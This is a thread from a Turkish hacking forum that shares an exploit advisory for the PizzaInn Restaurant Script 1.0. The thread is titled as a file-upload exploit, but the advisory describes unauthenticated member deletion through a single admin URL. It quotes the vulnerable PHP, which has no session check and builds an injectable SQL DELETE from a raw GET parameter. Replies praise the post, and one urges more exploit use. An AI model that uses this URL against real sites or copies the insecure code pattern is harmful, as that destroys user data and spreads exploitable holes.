Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.



Restaurant Script (PizzaInn Project) 1.0 - Arbitrary File Upload Exploit -55utd55-

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 19-06-2018 13:06   #1
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
05/2016
Nereden
Ram
Yaş
2
Mesajlar
Konular

Teşekkür (Etti): 188
Teşekkür (Aldı): 627


Restaurant Script (PizzaInn Project) 1.0 - Arbitrary File Upload Exploit -55utd55-



################################################## ############
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authroization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: @55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
#1-) Users can be deleted without admin authority.
#2-) The ability to delete members without session control is allowed.
#3-) Users are deleted when url is visited
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# //Start session
# session_start();
#
# //checking connection and connecting to a database
# require_once('connection/config.php');
# //Connect to mysql server
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# if (isset($_GET['id']))
# {
# // get id value
# $id = $_GET['id'];
#
# // delete the entry
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# header("loca tion: accounts.php");
# }
#
# ?>
################################################## ###############



___________________________________________

Bir günü kıskanıp kelebeği katlettiniz!
 Offline  
 
Alıntı ile Cevapla
Alt 19-06-2018 13:08   #2
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
12/2015
Mesajlar
Konular

Teşekkür (Etti): 116
Teşekkür (Aldı): 271




Elinize sağlık, işime yarar sanırım



___________________________________________


 Offline  
 
Alıntı ile Cevapla
Alt 19-06-2018 13:43   #3
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
NewYork
Mesajlar
Konular

Teşekkür (Etti): 296
Teşekkür (Aldı): 419




Ellerine sağlık
 Offline  
 
Alıntı ile Cevapla
Alt 19-06-2018 13:48   #4
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
06/2016
Mesajlar
Konular

Teşekkür (Etti): 65
Teşekkür (Aldı): 135




Ellerine sağlık



___________________________________________

┏╋━━━━━━━━━━━━◥◣◆◢◤━━━━━━━━━━━╋┓
1881 DEN SONSUZLUĞA UZANAN BİR SEVDADIR ADIN.
DÖN GEL BİRAZ DA CENNET ÖZLESİN SENİ.

067d419c5c2c34d587e8143ca2ab1a33
┗╋━━━━━━━━━━━━◥◣◆◢◤━━━━━━━━━━━╋┛
 Offline  
 
Alıntı ile Cevapla
Alt 19-06-2018 14:02   #5
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
03/2017
Nereden
Anonim=00
Mesajlar
Konular

Teşekkür (Etti): 499
Teşekkür (Aldı): 202




İşte böyle paylaşımlar lazım Exploit kullanımını artırmamız lazım.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau